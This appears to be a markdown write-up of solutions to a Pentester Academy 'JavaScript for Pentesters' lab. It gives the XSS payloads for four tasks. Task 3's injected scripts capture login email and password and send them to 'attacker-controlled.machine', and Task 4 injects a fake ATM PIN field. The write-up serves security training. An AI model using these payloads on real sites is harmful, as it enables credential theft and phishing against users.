Skip to content

Latest commit

 

History

History
99 lines (67 loc) · 2.72 KB

js-for-pentesters.md

File metadata and controls

99 lines (67 loc) · 2.72 KB
Raw

Target

https://www.pentesteracademy.com/course?id=11

Prereq

Include this in your .bashrc:

https://stackoverflow.com/questions/296536/how-to-urlencode-data-for-curl-command/10660730#10660730

Task 1

https://pentesteracademylab.appspot.com/lab/webapp/jfp/1

Solution

https://pentesteracademylab.appspot.com/lab/webapp/jfp/1?url=<payload>

Payloads generation:
$ rawurlencode '<script>document.getElementsByTagName("h2")[2].innerHTML = "Modified you"</script>'
$ rawurlencode '<script>document.getElementsByTagName("h1")[0].innerHTML = "Found you"</script>'

Task 2

https://pentesteracademylab.appspot.com/lab/webapp/jfp/2

Solution

https://pentesteracademylab.appspot.com/lab/webapp/jfp/2?url=<payload>

Payload generation:
$ rawurlencode '<script>for (i=0;i<document.getElementsByTagName("a").length;++i) { document.getElementsByTagName("a")[i].href = "http://PentesterAcademy.com/topics"; }</script>'

Task 3

https://pentesteracademylab.appspot.com/lab/webapp/jfp/3

Solution

https://pentesteracademylab.appspot.com/lab/webapp/jfp/[email protected]&password=111&url=<payload>

Preparing the payload (adding rouge <img> tag):

$ cat > JSforPentesters-3.js <<'EOF'
function intercept() {
    new Image().src = "https://attacker-controlled.machine/3?email=" + document.forms[0].elements[0].value + "&password=" + document.forms[0].elements[1].value;
    return false;
}
document.forms[0].onsubmit = intercept;
EOF

$ rawurlencode "<script>$(uglifyjs JSforPentesters-3.js)</script>"

Alternative payload (triggering xhr request - request will cause CORS abuse in browser but it will be sent, only the response will be blocked but the browser):

$ cat > JSforPentesters-3-2.js <<'EOF'
function intercept() {
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://attacker-controlled.machine/3?email=" + document.forms[0].elements[0].value + "&password=" + document.forms[0].elements[1].value);
    xhr.send();
    return false;
}
document.forms[0].onsubmit = intercept;
EOF

$ rawurlencode "<script>$(uglifyjs JSforPentesters-3-2.js)</script>"

Task 4

https://pentesteracademylab.appspot.com/lab/webapp/jfp/4

Solution

https://pentesteracademylab.appspot.com/lab/webapp/jfp/[email protected]&password=111&url=<payload>

Payload generation:

$ cat > JSforPentesters-4.js <<'EOF'
pin = document.createElement("input");
pin.setAttribute("type", "text");
pin.setAttribute("value", "");
pin.setAttribute("class", "input-block-level");
pin.setAttribute("placeholder", "ATM Pin");
pin.setAttribute("name", "pin"); 
document.forms[0].insertBefore(pin, document.forms[0].elements[1]);
EOF

$ rawurlencode "<script>$(uglifyjs JSforPentesters-4.js)</script>"